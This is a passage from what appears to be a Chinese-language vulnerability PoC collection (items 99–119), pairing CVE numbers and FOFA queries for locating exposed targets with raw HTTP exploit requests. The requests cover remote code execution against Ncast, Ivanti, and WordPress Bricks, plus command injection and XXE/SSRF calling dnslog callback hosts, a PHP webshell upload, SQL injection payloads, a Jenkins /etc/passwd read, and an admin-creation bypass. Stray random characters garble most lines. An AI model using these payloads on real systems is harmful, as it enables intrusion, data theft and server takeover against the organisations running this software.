, i9 }4 @: `8 I# f2 S& LContent-Type: application/x-www-form-urlencoded; charset=UTF-8
9 y! k3 s# {5 f( b7 X8 v! vX-Requested-With: XMLHttpRequest
' F6 W; ?- z# R( b- ?1 w' d1 F# q& R/ T1 c8 Z0 Z x- U0 B2 n
id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B& |& S G, R# |' d4 A, |* Q, }
- y6 g; o# y# v: n7 l
% y; o3 A5 h) @+ F: U
99. Ncast盈可视高清智能录播系统busiFacade RCE0 {, W9 k" f. G6 H: c
CVE-2024-0305, G+ x" J. R5 j' q1 S% Y( ^* I
FOFA:app="Ncast-产品" && title=="高清智能录播系统"% T- r7 s5 D& s8 l. v+ o8 y" V
POST /classes/common/busiFacade.php HTTP/1.12 \5 Q" c8 v" N$ o( L5 y/ _7 A' B
Host: 192.168.40.130:8080
% ]' V3 g# x9 V1 c( v' x1 aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
% O* @9 f. B% @Connection: close
3 Q- d- ?7 D9 t; v# z- a) RContent-Length: 154
/ a) x. V8 G) C" ~Accept: */*& J s) B* U b8 n! U1 |
Accept-Encoding: gzip, deflate9 ?, | B# v0 Z: E" \+ R4 X
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 _: S( M# E/ @1 @5 ^4 [9 X0 ^Content-Type: application/x-www-form-urlencoded; charset=UTF-8
/ j. e# M+ a& P* c o, JX-Requested-With: XMLHttpRequest( I; Y7 L, ^* t
s1 [' H+ G4 H0 t z" h/ S. _+ X1 V
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D
- W4 y' S5 A- h. t1 h5 U* n1 E4 a4 S3 }3 J/ Y( y
$ M2 t: @4 z& c% Q! Q* _2 e100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
& N7 r0 W6 T) J+ D f6 q) y% V, ?CVE-2024-0352" T+ w9 [+ n: S$ _
FOFA:icon_hash="874152924"; G1 Z4 R/ p/ B
POST /api/file/formimage HTTP/1.1
9 c* `/ K' ]7 [0 tHost: 192.168.40.130
: ?1 E* _" K" Y0 j# E$ u# lUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
: Z# s8 i5 p. n! ^Connection: close
2 v6 `# u* c4 t X `9 s2 o. h8 bContent-Length: 201
6 c4 E( ^% M0 f4 A3 s2 `Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
4 v6 j6 v- c( B" \ \5 `7 cAccept-Encoding: gzip
2 X1 N9 G* f% [' [; z# e. o+ S
0 F% ~" X7 ~: h* M* T1 y4 |& Y------WebKitFormBoundarygcflwtei4 |4 A! T: ~' E! A2 I: F' c; u5 K
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
4 N5 P! U/ {1 LContent-Type: application/x-php9 _6 }& Z" L2 O" l8 u
% t7 L8 @! x" H& [3 {2ayyhRXiAsKXL8olvF5s4qqyI2O
/ \" t! I% F+ R* j( i------WebKitFormBoundarygcflwtei--
( P/ W$ v) ~5 b( C+ n2 A0 V3 I! }" O! g* ~* S6 X
+ }# h4 P) R: ~7 w4 X& Z, {8 A; g# L
101. ivanti policy secure-22.6命令注入
, L$ S3 q: p4 oCVE-2024-21887) o* u8 \' q! `- p/ A
FOFA:body="welcome.cgi?p=logo"/ f, a8 d" j2 R) e1 M
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
) G) D# @' @ y' S" l, fHost: x.x.x.xx.x.x.x _' x- w( {+ e: ~- a- U
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36. A x1 j& [% V0 P
Connection: close# _2 I( ?6 {9 m! e
Accept-Encoding: gzip- ^1 r2 S* T6 D& Y& l5 C# @1 j7 N) d
8 \9 E& I5 e2 F$ I0 y6 f
7 h9 _. h8 j; m% M" [0 m. R102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
& g4 \, ^$ b% ]CVE-2024-21893! E, ^% @; C3 G# q5 p ?
FOFA:body="welcome.cgi?p=logo"
( R( V: `3 l: s, V! E* Q: d! {POST /dana-ws/saml20.ws HTTP/1.1% Q, t) H# Z0 ]$ \7 C& p6 P
Host: x.x.x.x' D2 U* ~' b' c, t* N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36/ B- b( {4 W& f( p+ Z
Connection: close& ?/ I j& T8 u4 i- ~7 l
Content-Length: 792# W- X' [& j+ M
Accept-Encoding: gzip
) X* U* ]% ?# x! l3 s5 t% t* D/ q* f6 m" S b) f) E" @7 T, p
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>' n! c6 X. @/ S
% z# V0 H' k3 }103. Ivanti Pulse Connect Secure VPN XXE
6 z" E; m$ W! BCVE-2024-22024
3 R o4 Y5 H+ U3 ?4 MFOFA:body="welcome.cgi?p=logo"3 i% y7 P. u* a% ]) Z3 I
POST /dana-na/auth/saml-sso.cgi HTTP/1.1( @( D6 S3 E6 f* w+ Y& i9 J
Host: 192.168.40.130:111. k0 j: Y1 \( j/ l# T
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.366 w8 c' K Q, L4 w/ i6 i- o6 y
Connection: close j3 k$ o4 e! G
Content-Length: 204
! x4 A9 ]6 z) [Content-Type: application/x-www-form-urlencoded4 X/ u% @* D6 h6 V
Accept-Encoding: gzip3 |% M8 g/ ^" B5 F7 d& }" e
0 u. }$ D1 U& f6 ~" |+ _SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
8 s" x; O2 @6 |, [) |) p
! |# \* C! T2 A1 L! U' A9 i! a7 R! D" \/ }
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下2 j& _* u7 @2 C2 ?$ `: C
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>9 J) d, M0 L9 W- x8 Q
8 ?8 u' V" m( J( M$ x& j5 q4 I( r; o {: L& q, v
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露' m" d$ r, C) u8 M6 j1 |
CVE-2024-0569% N1 P9 C8 {5 k# |
FOFA:title="TOTOLINK"8 Y3 N. S: V$ [8 P- \, A) H/ {) {0 r
POST /cgi-bin/cstecgi.cgi HTTP/1.1
) G; f8 r6 ~( y4 e4 ~0 ^/ f7 ^Host:192.168.0.1; H3 F- B/ K5 H; L4 \) _" ]+ ~
Content-Length:41
" w! F' X, d" q% Q AAccept:application/json,text/javascript,*/*;q=0.01
' }: D) p: d7 \! n# ]8 ^" HX-Requested-with: XMLHttpRequest3 G0 ^5 z. t* O: J% n; E
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
, F; j/ G$ ?5 m' _5 ?* NContent-Type: application/x-www-form-urlencoded:charset=UTF-8
) T" c; r2 M, S& uOrigin: http://192.168.0.1
; v; n8 Y1 z; g) t6 C) V/ wReferer: http://192.168.0.1/advance/index.html?time=16711523805645 W/ x) A) [3 E7 v! |/ o
Accept-Encoding:gzip,deflate! n, G8 l$ Y7 d6 V
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
2 S8 M& b6 i# e7 c4 V5 b8 l1 V( OConnection:close( O5 L7 s8 b( s
3 F: ]$ f L! {: k/ T* N{4 o0 j2 Y% i. S/ y
"topicurl":"getSysStatusCfg",
, ^5 e t$ y t"token":""
: o7 T; C# ]2 u! H}
( \5 X8 n1 o7 o+ o7 R3 U# H) R
6 W& f7 M: E+ w4 w" Z: ?9 _# G, H105. SpringBlade v3.2.0 export-user SQL 注入
$ W) g# @9 o2 ZFOFA:body="https://bladex.vip"
/ f. Z, |6 d- K6 H j* bhttp://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
" M* ]: ?( S! o9 M% y6 g
4 N, H% ^( U F/ S' H+ v; b+ {106. SpringBlade dict-biz/list SQL 注入
- n& s$ R7 }- n Y4 b' c2 v# \FOFA:body="Saber 将不能正常工作"
- j* v; [" K) f- q5 f5 K3 NGET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.14 V: a- s/ Z4 o" j/ _- Z
Host: your-ip
8 |$ q8 I4 d4 ]# O" _# j4 IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36* V: M% B5 c" a
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A. S" x) H3 R4 c# G% x- R/ g2 M! Y K5 G' m
Accept-Encoding: gzip, deflate* R2 h1 z6 R1 a4 k: L/ r
Accept-Language: zh-CN,zh;q=0.9
3 y' e1 d l2 l. @Connection: close: V0 v* {0 q2 K# ?$ k' c- U
p" ?+ P2 [2 w# D! a F1 Q0 x8 u
107. SpringBlade tenant/list SQL 注入( \' _' \' Y) }% [8 S- _% `
FOFA:body="https://bladex.vip"
% A# l; J& J: f7 l; d. W, hGET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.18 e) p: w8 i3 f" W" _0 u+ Z
Host: your-ip
; j% n* E3 V/ {7 A3 {8 _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.361 `" j6 O6 J7 a* M# S. L
Blade-Auth:替换为自己的
5 I% _0 A6 U& d& ~7 K3 y8 yConnection: close. X- f: z5 A% E7 }+ ? k( d8 m/ X( O
; |9 T6 `& R [) j/ @5 w# y' x- e
8 o( b4 l* p3 E& X" ]
108. D-Tale 3.9.0 SSRF
% H4 C4 ~" p: GCVE-2024-21642$ S2 T k( w7 p" ?7 _4 V, s- e
FOFA:"dtale/static/images/favicon.png"
$ z) a: ]. P) E+ oGET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1, b2 y& i* G3 f. @. b9 p
Host: your-ip
9 j) c" A U1 c, EAccept: application/json, text/plain, */*
4 D* @; P+ v8 G' L" jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
) n: Z( I5 S) T+ X9 Q( B' ]Accept-Encoding: gzip, deflate* f n0 @# Y2 O: p/ H' ~
Accept-Language: zh-CN,zh;q=0.9,en;q=0.84 u5 j5 O: L9 |/ m$ {, |; p; ~+ M" `
Connection: close
5 L, M( E: R; O9 q# k: V, D, \" F: h# M" q1 {: `4 r7 U
/ D& b: ^6 r: ?9 o4 T7 A
109. Jenkins CLI 任意文件读取
3 U( l7 |. a5 x, gCVE-2024-23897- F( O6 M# G3 f
FOFA:header="X-Jenkins"
% z- q; e7 [# S* M! Q, m6 h" ]POST /cli?remoting=false HTTP/1.1- ?$ |4 d& j% D. _' d: j, f
Host:
" n7 v3 y9 v+ \4 c# ^Content-type: application/octet-stream
/ E0 ?" K4 {6 B! h9 e PSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
9 d7 K- f) p/ qSide: upload/ x9 L# {2 t" A/ t
Connection: keep-alive
# l: q/ \8 o& SContent-Length: 163+ s. [2 j# A% D0 B5 Y
& s D' B* v4 h) [) D
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'0 p& Y) S' I1 F# H
3 Q, J% T. _& j9 V2 C4 |: h5 W j: z+ e" U9 l H4 A
POST /cli?remoting=false HTTP/1.1
7 J3 t* m( f) T/ L7 K8 _Host:8 D- i% c( h; R2 r# f
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
8 r' G6 a7 n. d, D. |, E4 |! `download
2 G8 f2 B Q# q# wContent-Type: application/x-www-form-urlencoded
+ _ y4 o& _) @$ i3 f; P/ N8 wContent-Length: 0
8 K# c* n/ ~, O! g' v! U I) Y, L' e, B' f" `5 I
9 s8 N& H0 x8 Q; _: d E; j( `ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
! M/ f3 x+ F, }' X3 njava -jar jenkins-cli.jar help; |' y- s- [. T/ F b/ y+ Y% f
[COMMAND]6 \' K) ?, p. x w# P& S& J3 [
Lists all the available commands or a detailed description of single command.: \. ?7 s+ ~. V1 @, |& L
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
! [7 T' s3 j6 e' T! x6 P3 T- U/ k% Q- c" w% H8 Q0 O5 y
# u! Q: u1 y5 z$ I5 t0 P110. Goanywhere MFT 未授权创建管理员
! G! ?8 n4 x+ \" {1 eCVE-2024-02043 m+ U$ r5 ?+ {, f
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
0 i6 C1 _" s7 Z x! V- {, jGET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1$ M3 K9 m7 C& S
Host: 192.168.40.130:8000 w( H9 s2 R# p* ~
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
t. }7 |: N: S& R$ C, f2 M! S# R# gConnection: close+ b. w A% e2 F; M0 j5 E" K6 K* Y
Accept: */*
7 V Q2 L( _1 P& k( sAccept-Language: en2 T4 r: C |7 [3 W/ L
Accept-Encoding: gzip
; l; p+ ^) @( q* \# ~ T+ W. N4 D! [/ w. P0 s; U# o2 `
2 Z/ S1 u; P0 s& s; {% z- e0 R1 u1 A111. WordPress Plugin HTML5 Video Player SQL注入
7 q% [, u/ L4 s0 ]CVE-2024-10615 j6 T5 f3 y! l6 G# U$ x6 n
FOFA:"wordpress" && body="html5-video-player"
+ M& I6 U8 `$ C2 L! F/ gGET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
; C' z4 l/ I3 C: k3 R; P/ }- _Host: 192.168.40.130:1126 O1 d1 u( t% N8 }# S
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
3 v7 @$ G+ I9 ~: t% \. eConnection: close
3 T' B2 j7 t: W) \# BAccept: */*
5 X( k" x9 ~1 g; B7 qAccept-Language: en+ @& R2 G# `6 |0 p
Accept-Encoding: gzip
2 B- r5 `: v; V1 Y2 J
n. S2 a, }' K/ W- Y' Q( q, q4 l1 u0 m! k+ k' v( I6 H
112. WordPress Plugin NotificationX SQL 注入
9 A$ c$ K4 u: k, b/ w/ LCVE-2024-1698
: N; Z& y* ]+ P5 g) X; y- D1 [FOFA:body="/wp-content/plugins/notificationx"
; M: {3 L# a- m" CPOST /wp-json/notificationx/v1/analytics HTTP/1.1) t: s( o* z! V' m
Host: {{Hostname}}
$ E. }* h( z: [* _Content-Type: application/json
9 X Z) t* }, l- G w6 m I( h6 O3 d- q. M3 E$ d
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}! f8 T7 }( I' f$ m$ `1 H
* b3 B! @# i% v3 J5 V2 @9 P
. v% e- F. v3 X+ e, g: a; ^
113. WordPress Automatic 插件任意文件下载和SSRF
9 \. d0 A, I! Q {' DCVE-2024-27954
4 x* n) F6 K, b+ kFOFA:"/wp-content/plugins/wp-automatic"
! s$ |5 ?) Q6 X1 B" L" ~4 YGET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1: b/ X( V9 l" c0 Z _! ^( ^& @7 |
Host: x.x.x.x4 I$ N7 t! e0 P- c4 F
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
* Q* |$ `- V" D# q0 [Connection: close
# x: O d# C9 ]: ZAccept: */*( H9 Q3 T0 C- Y8 n2 C0 e
Accept-Language: en
) h$ z* d2 N5 _3 h! C. YAccept-Encoding: gzip
: k/ B2 g5 r; s2 B% v' q1 Y% }: l9 x, s. c
5 r1 A' }' U3 i114. WordPress MasterStudy LMS插件 SQL注入4 O1 i* T; m8 G0 F7 h/ r# O
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/") M5 Z2 W5 Q* f5 X2 Z+ x
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1) @8 O. y8 A) i, J
Host: your-ip
( G! `: `; ^. x$ x) c& z1 CUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
7 U7 }- i3 d# t1 FAccept-Charset: utf-8
& ?: j8 D- d2 g! R5 hAccept-Encoding: gzip, deflate. U" V, L: N2 W2 Q: U+ u
Connection: close4 O) L" o3 K, \! ]$ s0 S! Z" k- W. _; [
% f8 Y" [3 l8 [2 Z
" m* }% Z1 R2 q115. WordPress Bricks Builder <= 1.9.6 RCE
2 l8 o2 L: l( q' sCVE-2024-25600- t. d4 N. C# U, x% f J+ |
FOFA: body="/wp-content/themes/bricks/") b1 y, }& L" e" M! d. s) D( y
第一步,获取网站的nonce值# s7 C, \" f5 S* N/ C
GET / HTTP/1.1
4 t! ?! g! j1 o9 |/ P* G) }- G: ?Host: x.x.x.x9 c4 A' V, W8 `3 |! v- D$ Z
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36/ |+ t5 [. C- V. r* K% W% {
Connection: close
! U/ s$ n, Y; f2 a- O% Y9 o6 yAccept-Encoding: gzip
: N. v, U2 L' T& Y/ G1 ]; H, R* Z! N- P
4 R2 E6 f4 r- S# \9 i# T' F, ^% E5 r* B9 |2 [3 F3 f
第二步替换nonce值,执行命令
# N: A; @# m* X) T4 ]" NPOST /wp-json/bricks/v1/render_element HTTP/1.1
. p$ F- n* Q9 N' b0 a( kHost: x.x.x.x6 E5 V6 n$ }, |, h% D2 Q5 f
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.367 B4 ~0 {9 G5 E! j
Connection: close
; O: ]. `( ?/ N- ?6 A2 a1 \Content-Length: 356' b5 K- [# Z! L/ A7 ]
Content-Type: application/json
5 Y% _% ~8 F2 Z# vAccept-Encoding: gzip2 F8 T w7 u" f
% n( b& U8 [. y5 g; g$ Q4 o
{
7 r( M, Q" j! r! p"postId": "1",
* N6 g1 {0 Y! X6 \! M, E "nonce": "第一步获得的值",
2 n$ f% Z5 G5 z! s "element": {
+ t$ x* a2 h/ K+ _ "name": "container",
- a3 B1 ?& m5 i* ]" z" p" ^ "settings": {
* {2 C8 r3 {# ^$ K: d "hasLoop": "true",
/ i7 U; x4 K0 U" i! H6 h "query": {
" v' R- M9 D" i" ? "useQueryEditor": true, J) r& F7 O) [/ c2 p' b: e2 T
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
4 s, Y) ?' v D9 Q: R "objectType": "post"* ?; \) T" w5 o i; p
}
3 A: r8 M! d( Q' t9 Y }
# W/ M8 e" q' I) {: E }
+ L4 l: [+ p2 j2 w2 A$ K& H}
+ S6 T: V7 {# E4 ~6 N# u" `
/ s( t5 A7 v! K9 P1 o& |+ C: p! L6 @- w
116. wordpress js-support-ticket文件上传
! T5 Q0 l% b: Q6 S, H b& c' T% m8 o+ DFOFA:body="wp-content/plugins/js-support-ticket" t! R& o' X4 Q8 C6 z
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
. Y- l1 Y( y8 d3 SHost:( S6 M7 ~% t5 P/ R
Content-Type: multipart/form-data; boundary=--------767099171
. W7 l+ f: g4 T3 [. e8 I% BUser-Agent: Mozilla/5.0) V% n K+ A$ y; \- x, _
2 d7 t& m$ r1 \8 m----------767099171
9 V; g: A& l5 r. V( ~Content-Disposition: form-data; name="action"
" Q) P7 B, J2 i4 ~( e R% hconfiguration_saveconfiguration/ O" \, F$ U7 }- | \% |2 T
----------7670991716 N9 f0 D5 E' w
Content-Disposition: form-data; name="form_request"
2 ^- _9 e& }& E, K% h; ^/ p3 bjssupportticket; ~7 f. P7 W9 B
----------767099171
: d4 D) N) y# PContent-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"7 `. W) i# {: A3 ~& \8 G
Content-Type: image/png
) N8 `. u7 k O# J----------767099171--
' n5 v7 d& o- M$ `( |
2 I( Y2 p3 B! q$ C! Y5 M: f9 K' H5 H2 h2 Y, l
117. WordPress LayerSlider插件SQL注入: n* a3 e+ F: L' y" W
version:7.9.11 – 7.10.07 x+ ~0 c3 L7 S# |
FOFA:body="/wp-content/plugins/LayerSlider/"
1 e5 p6 g, |- lGET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
1 E1 r, W+ A0 s5 f* D1 @Host: your-ip; F% }+ R% Q+ b$ j/ O! q: J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
% K) Q8 f6 _! V% [4 JAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8$ j2 G+ N; A! X5 l
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- v# j5 P6 n8 p( |' H- S! iAccept-Encoding: gzip, deflate, br, |* ]9 j+ I# \' q
Connection: close
" K7 P! n$ \- BUpgrade-Insecure-Requests: 1
: B$ I6 I& f4 C5 b! s
f' ^: b0 P: `& \& l4 _. E, p$ X+ i6 I, d! Q
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
) u+ G; T/ q1 Y; ]/ |CVE-2024-09395 M9 O" Q- B% L4 I( t& W, H5 \" F
FOFA:title="Smart管理平台"$ m/ U t# @* r4 s
POST /Tool/uploadfile.php? HTTP/1.1
" u3 X, ]2 z' _1 l6 |9 n5 U: RHost: 192.168.40.130:8443
) `* @2 h- ?" ^Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
c) X8 V7 O Z6 U) N% hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
+ P& n- G2 P% `$ `5 `Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8/ S9 E' u. e* N" E0 F) r0 N
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ Q, F$ n/ q( y4 _6 ^, ZAccept-Encoding: gzip, deflate
+ a! C$ l+ J" o$ Q, lContent-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
3 p' n( X( \+ m4 z X# I% z% y1 |Content-Length: 405 z/ q, l2 q% z' u
Origin: https://192.168.40.130:8443( ?2 U2 H9 U' M/ M
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
/ u! f6 p& Y+ CUpgrade-Insecure-Requests: 1
6 |: ~# H+ _" i) T' n4 A" v7 ` iSec-Fetch-Dest: document
* a* F! b) h$ e# S9 I6 u* OSec-Fetch-Mode: navigate
# B2 l" T, f, Z0 a, j: N* s$ ASec-Fetch-Site: same-origin
8 D) G& c6 T) Z" lSec-Fetch-User: ?1
& ] @2 G) \7 s" w3 b8 e6 }Te: trailers
4 M( Q7 I1 s$ ], ?/ D' QConnection: close! E$ Q9 L& D* M" W* {- P' Y
# A$ a6 u) J) o+ U l
-----------------------------13979701222747646634037182887! Q' N* |, v* ]) f% N" p ]- t
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
@; Z% |. d$ E6 W0 kContent-Type: application/octet-stream6 ~6 j! M5 x4 P% z! V& r
; w3 x0 r3 F% u: w. ?. M/ q
<?php
g8 J" q, j+ V3 i3 v" Isystem($_POST["passwd"]);
+ f- m; B" q6 q7 G. {, m" V+ ??>
9 `" Z) S+ y6 g7 ~-----------------------------13979701222747646634037182887; q2 B* W/ W4 B( s- Y
Content-Disposition: form-data; name="txt_path"
# q( K7 D1 ~9 ~/ ~, C/ x# J+ E& C+ `! a5 _: R# Y( H
/home/src.php
/ T5 M B% K6 b: |0 l-----------------------------13979701222747646634037182887--
5 G; M% j* U5 V8 g6 x8 Y0 l! A% B- N7 b1 }8 Q
& @6 u, e% D3 v
访问/home/src.php: R' m2 m8 A7 ]4 c
/ J' w0 @; B, C) H Q4 i9 k119. 北京百绰智能S20后台sysmanageajax.php sql注入! c6 {) L3 O7 L# k1 j& M! j/ |
CVE-2024-1254
2 `6 ]) |! U5 G) m# ZFOFA:title="Smart管理平台"
9 h5 v! A* Y/ u1 E先登录进入系统,默认账号密码为admin/admin$ ?4 H o/ m4 l; x( S
POST /sysmanage/sysmanageajax.php HTTP/1.11
& B% @. M- G% x6 _7 {: `Host: x.x.x.x
( J# f3 ?& [8 z8 j1 b0 y) g7 WCookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee( c! p, q) I7 e. Z9 \' h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
5 R& E+ ^2 |) w5 yAccept: */*3 M2 B$ o$ r. X$ S. @; F
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 m* m9 M- B3 H1 `
Accept-Encoding: gzip, deflate6 r: [3 V, Z' Z
Content-Type: application/x-www-form-urlencoded;4 I% G: ~/ T( R' K6 q0 A% F
Content-Length: 109
4 w7 \: O H t: h3 P u+ a6 QOrigin: https://58.18.133.60:8443# A) l) E4 D# Y- J
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php7 i, g. E( o/ c
Sec-Fetch-Dest: empty
7 B2 n3 Z4 w$ I* ]Sec-Fetch-Mode: cors: q; @ i( K1 H/ ]7 v( Q
Sec-Fetch-Site: same-origin
. X' Z- E# A% R1 r+ i2 t+ ~X-Forwarded-For: 1.1.1.19 R' A z* }7 `$ m" e% }% ^, N
X-Originating-Ip: 1.1.1.1
8 R- e0 }( |* E; M2 g! ^1 AX-Remote-Ip: 1.1.1.1
( E: j6 L) q* c" \X-Remote-Addr: 1.1.1.1
% v; l/ N- I# KTe: trailers
$ O0 u: v2 ]* v x2 a4 \- iConnection: close& o! }/ ], K0 M; g
- U7 i6 B" {; k7 d
